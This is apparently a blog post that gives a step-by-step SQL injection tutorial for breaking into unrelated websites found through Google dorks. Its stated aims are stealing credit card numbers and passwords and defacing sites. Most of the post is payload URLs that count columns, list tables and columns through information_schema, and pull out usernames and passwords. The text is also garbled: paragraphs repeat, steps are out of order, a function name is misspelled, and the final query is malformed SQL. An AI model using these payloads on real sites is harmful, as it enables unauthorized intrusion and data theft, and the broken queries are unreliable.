#2.1 : Hacking Tips
SQL Injection Tutorial with Example English
SQL injection is one of the most popular method of hacking a web application. This method exploits the security flaws of a website and a hacker can access the database of a site. You can delete, steal or insert data into a database.
You can steal credit card numbers, passwords, de-morph a site etc. I'm going to explain the whole process in detail.
You can steal credit card numbers, passwords, de-morph a site etc. I'm going to explain the whole process in detail.
==========================================================
So you've found the vulnerable website, now it's time to check the number of columns. Replace the apostrophe (') with "order by 1" statement, keep the number (1) increasing to 2,3, 4....n until you get an error saying "unknown column".
Now we'll retrieve the SQL version, database's name and username.
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, group_contact(column_name), 4, 5, 6, 7, 8 from information_schema.columns where table_name=CHAR(your value)--
1. Finding a Vulnerable Website
First of all you need to find a vulnerable site, you can use Google dork to do get a list of SQL injection vulnerable sites. A vulnerable site has some sort of flaw in its structure which will be exploited by a hacker, you can search for lists of such site by searching for "List of SQL vulnerable site" in Google. You won't have much difficulty finding a vulnerable website. You can find vulnerable sites by simply typing the given keywords in Google search box.
Examples -
inurl:index.php?id=
inurl:article.php?id=
inurl:page.php?id=
inurl:index.php?id=
inurl:article.php?id=
inurl:page.php?id=
There are other keywords you can use, I've mentioned a few. Any Google dork will display numerous results but not all of them are vulnerable, on the other hand if you searched for list of vulnerable sites, you will see a huge list of such sites. If you have executed the first step then we'll move on to the second.
-------------------------------------------------------------------------------
2. Checking the Vulnerability
Now you've found websites matching the above keywords or you might have found a list of SQL vulnerable websites. Now you'll have to check whether they're vulnerable or not. This step will deteremine whether the site can be hacked or not, it can be done with an apostrophe. Let's assume we have found a site http://www.example.com/index.php?id=2 . Add an apostrophe (') at the end of the URL and hit enter.
Example -
http://www.example.com/index.php?id=2'
http://www.example.com/index.php?id=2'
If the page loads normally or shows 'page not found', then it is not vulnerable. But if you get an error message, then the site is vulnerable. You should get an error message like this, if the site is vulnerable.
Example -
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\" at line 1."
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\" at line 1."
Congratulations!!! if you've got the message, find a new one if the current URL isn't vulnerable.
-------------------------------------------------------------------------------
3. Finding the Number of Columns
So you've found the vulnerable website, now it's time to check the number of columns. Replace the apostrophe (') with "order by 1" statement, keep the number (1) increasing to 2,3, 4....n until you get an error saying "unknown column".
Example -
http://www.example.com/index.php?id=2 order by 1
No error
http://www.example.com/index.php?id=2 order by 2
No error
http://www.example.com/index.php?id=2 order by 3
No error
http://www.example.com/index.php?id=2 order by 9
Error found "Unknown column".
Let's assume we've got an error on the 9 statement, it means that there are 8 columns in the database.
If the above statements fails, then add "--" at the end of the URL.
http://www.example.com/index.php?id=2 order by 1
No error
http://www.example.com/index.php?id=2 order by 2
No error
http://www.example.com/index.php?id=2 order by 3
No error
http://www.example.com/index.php?id=2 order by 9
Error found "Unknown column".
Let's assume we've got an error on the 9 statement, it means that there are 8 columns in the database.
If the above statements fails, then add "--" at the end of the URL.
Example-
http://www.example.com/index.php?id=2 order by 1--
http://www.example.com/index.php?id=2 order by 1--
-------------------------------------------------------------------------------
4. Find Vulnerable Columns
Now we have discovered the number of columns present in the database. We will use "union select" statement to find out the vulnerable columns. Vulnerable columns are the columns that can be hacked. Change the id value to negative (-2). Replace the column sequence to the maximum number of columns.
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, 3, 4, 5, 6, 7, 8--
After executing the above statement you will find the vulnerable columns displayed on your screen.
http://www.example.com/index.php?id=-2 union select 1, 2, 3, 4, 5, 6, 7, 8--
After executing the above statement you will find the vulnerable columns displayed on your screen.
Example -
3 query was empty 7
The above line shows 3 and 7 are vulnerable and now we can inject our code in it.
3 query was empty 7
The above line shows 3 and 7 are vulnerable and now we can inject our code in it.
-------------------------------------------------------------------------------
5. Find SQL version, Database, Username
Now we'll retrieve the SQL version, database's name and username.
SQL Version
We'll work in column number 3 and replace the vulnerable column with "version()" to fetch the version of the database, it is important to know the version because older version will need different statements to execute to a query.
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, version(), 4, 5, 6, 7, 8--
Press enter and you'll find something like this -
5.0.1 or 4.3.0 (This is SQL version).
http://www.example.com/index.php?id=-2 union select 1, 2, version(), 4, 5, 6, 7, 8--
Press enter and you'll find something like this -
5.0.1 or 4.3.0 (This is SQL version).
Database
We'll now find the database's name.
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, database(), 3, 4, 5, 6, 7, 8--
Username This step will be used to retrieve the username.
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, user(), 4, 5, 6, 7, 8--
We'll now find the database's name.
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, database(), 3, 4, 5, 6, 7, 8--
Username This step will be used to retrieve the username.
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, user(), 4, 5, 6, 7, 8--
-------------------------------------------------------------------------------
6. Getting the Table Name
Now we'll have to find the table's name, though you can guess a table name like this - admin, members etc. But we'll more effective method.
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, group_concat(table_name), 4, 5, 6, 7, 8 from information_schema.tables where table_schema=database()--
Now we'll have to find the table's name, though you can guess a table name like this - admin, members etc. But we'll more effective method.
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, group_concat(table_name), 4, 5, 6, 7, 8 from information_schema.tables where table_schema=database()--
-------------------------------------------------------------------------------
7. Get Column Name
You'll need some external help. You've got the table name in the previous step, you will have to convert in char string. You can use a freeware to do it.Example -
http://www.example.com/index.php?id=-2 union select 1, 2, group_contact(column_name), 4, 5, 6, 7, 8 from information_schema.columns where table_name=CHAR(your value)--
-------------------------------------------------------------------------------
http://www.example.com/index.php?id=-2 union select 1, 2, group_contact(username,0x2a,password), 4, 5, 6, 7, 8 from database()--
8. Display Password & Username
Example -http://www.example.com/index.php?id=-2 union select 1, 2, group_contact(username,0x2a,password), 4, 5, 6, 7, 8 from database()--
Now you will get displayed the username and password on your screen, congrats!, now you can do anything to the database you can steal, modify or delete the info.
-------------------------------------------------------------------------------
.m@
My Site : iitboss.com
No comments :
Post a Comment